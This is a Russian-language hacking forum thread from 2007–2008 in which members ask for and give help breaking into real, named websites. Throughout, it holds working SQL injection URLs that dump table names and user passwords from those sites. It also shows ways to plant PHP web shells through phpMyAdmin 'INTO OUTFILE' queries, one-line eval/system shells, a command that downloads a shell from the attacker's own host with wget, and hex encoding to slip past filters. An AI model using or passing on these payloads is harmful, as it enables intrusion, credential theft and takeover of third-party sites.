Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Народ прошу помощи.
    Вобщем есть рут доступ к PhpMyAdmin

    Мне нужно залить шел, но проблема в том что там инклуды отключены :mad:
    Я заливал с помощью такого запроса
    CREATE TABLE `forshelll` (`shl` TEXT NOT NULL)
    TYPE = MYISAM ;
    INSERT INTO `forshelll` ( `shell` )
    VALUES (
    '<?php include("http://shell.ru/shell.php") ?>'
    ); SELECT `shell` FROM `forshelll` INTO OUTFILE 'patch/www/shell.php'; DROP TABLE `forshelll`

    Ворпос! как можно ище залить без инклуда?
     
  2. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    2 DJ ][akep
    Юзай поиск, мне вот что часто помогало -
    http://forum.antichat.ru/showpost.php?p=796617
     
    1 person likes this.
  3. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Копал рыл ничего не нашёл! Гуру анти чата могет вы помогете!

    www.dom2.ru есть уязвимости?

    http://dom2.ru/pulse/heroes/?id=15601'

    http://dom2.ru/magazine/?id=27965&article=3'

    Жду ответа?
    ___________________________________________

    И это уязвимость?
    http://www.rk-triada.ru/index.php?-999
     
    #3103 geforce, 31 Aug 2008
    Last edited: 31 Aug 2008
  4. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    PHP:
    if(isset($_GET['shell'])) eval($_GET['shell']);
    PHP:
    <?php system($_GET['cmd']);?>
    Хотя смысл один и тот же...
     
  5. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    SELECT '<?php if(isset($_REQUEST["id"])) eval($_REQUEST["id"]);?>' INTO OUTFILE '/blablabla/www/script.php';

    Если пхпмайадмин будет ругаться, то переводи текст в кавычках в SQL HEX:
    http://hack-shop.org.ru/tools-code-encode
    И потом уже без кавычек подставляй в запрос.

    /script.php?id=copy("http://shellsite.ru/shell.txt","/blablabla/www/shell.php");

    /shell.php - тут шелл. Ессно должны быть права на запись, иначе хер что сделаешь.
     
  6. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    А не подскажите что можно сделать с сайтом у которого идёт фильтрация против SQl инъекций...
    Движок: PHP-nuke
    Модули:
    /modules.php?name=WhatYourSpeed
    /modules.php?name=Rules
    /modules.php?name=Downloads

    Ссылка: _http://la2ice.ru/
     
  7. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    Доброго времени суток!
    сайт http://geograd.ru/
    magic_quotes off
    мускул 5-ой версии
    http://geograd.ru/?geo=-1&idnew=-328%27+union+select+1,2,3,4,table_schema+from+information_schema.tables/*%22
    тут все базы,судя по ним на серве крутится много сайтиков(если не прав,поправьте)
    подскажите,как можно залить шелл на серв в данном случае?
     
  8. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    <? system("cd ../../;wget http://...../shell.php"); ?>

    cd ../../ - папка куда залить..
    wget - качалка. взависимости еcть ли он на серве..
    может быть lynx и т.д.
    http://...../shell.php - твой сайт с php-шеллом

    Ps: Если скрипт пропускает какие-то символы шел никак не залить. (конечно, может быть случай когда поле "отправить коментарий" выпоняет команду на сервере, но такой случай мы не будем рассматривать)
    Поэтому советую xss или sql inj, дабы получить админ права. А у админа больше прав, там уже и до шела не далеко:)
     
    1 person likes this.
  9. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Похоже что права есть... значит можно залить шелл использую into outfile '/Полный путь/имя.php
    Нужно найти путь
    запрос выглядеть будет так
    union+select+1,2,'<? system($_GET["id"]); ?>',4,5+into outfile '/Полный путь/имя.php'/*
     
    #3109 Red_Red1, 1 Sep 2008
    Last edited: 1 Sep 2008
    1 person likes this.
  10. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    что мне даёт раскрытие пути до сайта ?
    что можно с этим сделать ?
     
  11. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    ты знаешь путь к папке, где лежат все скрипты сайта - следовательно ты знаешь куда можно залить шелл..
    если есть файл-прив при скуль-инъекте то можешь опять же залить шелл, путь есть.. и вообще есть много способов как с этим расправится=)
     
  12. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    всем привет,
    в очередной раз наткнулся на такую неприятность, когда из 5 sql удалось выцепить все таблицы, но не одна из них не является таблицей с пользователями (все колонки в каждой просматрел) такое вообще возможно? И как с этим бороться?
    Вот пример
    _http://www.semenovsky.ru/?pageId=3&mode=cards&Id=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.TABLES++limit+16,200--
    Заранее благодарен
     
  13. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    такое вполне возможно,ничего такого тут нет,авторизация происходит значит по другому...
    или на сайте вообще нет админки,что тоже вполне нормально для небольших проектов...
    если я не прав,то поправьте)
     
  14. masterBlack

    masterBlack New Member

    Joined:
    12 Jun 2008
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    1)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_name,5,6+from+information_schema.tables/* -фсЁ ок)
    2)http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,column_name,5,6+from+information_schema.columns+where+table_name=0x7573657273/* -фсЁ ок)
    3 финал) http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3,password),5,6+from+users/* -не пашет((((((((
    что не так с финальным запросом???????????
     
  15. Lancellot

    Lancellot Member

    Joined:
    9 Aug 2006
    Messages:
    138
    Likes Received:
    23
    Reputations:
    7
    http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,4,5,6+from+users/*
    а где здесь фсё ок?
     
    1 person likes this.
  16. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    Вот тебе что наверное надо)
    http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,concat_ws(username,0x3a,passwd),5,6+from+cms_user/*
     
    1 person likes this.
  17. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    Возможно таблица лежит в другой базе...сделай вот такой запрос и посмотри базы:
    http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_schema,5,6+from+information_schema.tables/*
     
    1 person likes this.
  18. zjuk@

    zjuk@ New Member

    Joined:
    4 Sep 2007
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    MirA спасибо. Люди, а как быть здесь, есть вот чего
    Но логины не подходят к админке http://www.sarbc.ru/admin
    И хэш декодеры говорят, что мол, формат неверный, как быть-то вроде всё ж на ладони. Поможите пожалуйста, заранее благодарен.
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    tor4),MirA
    Вы прикалываетесь? Или я тупой? Где там инъекция? Или вы даёте советы даже не ходя по ссылкам?
     
    1 person likes this.
  20. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    Проверил, инекция была и сплыла) Быстро работают админы.
    Думаю пароли тоже сменил.
     
    #3120 tor4), 2 Sep 2008
    Last edited: 2 Sep 2008
Thread Status:
Not open for further replies.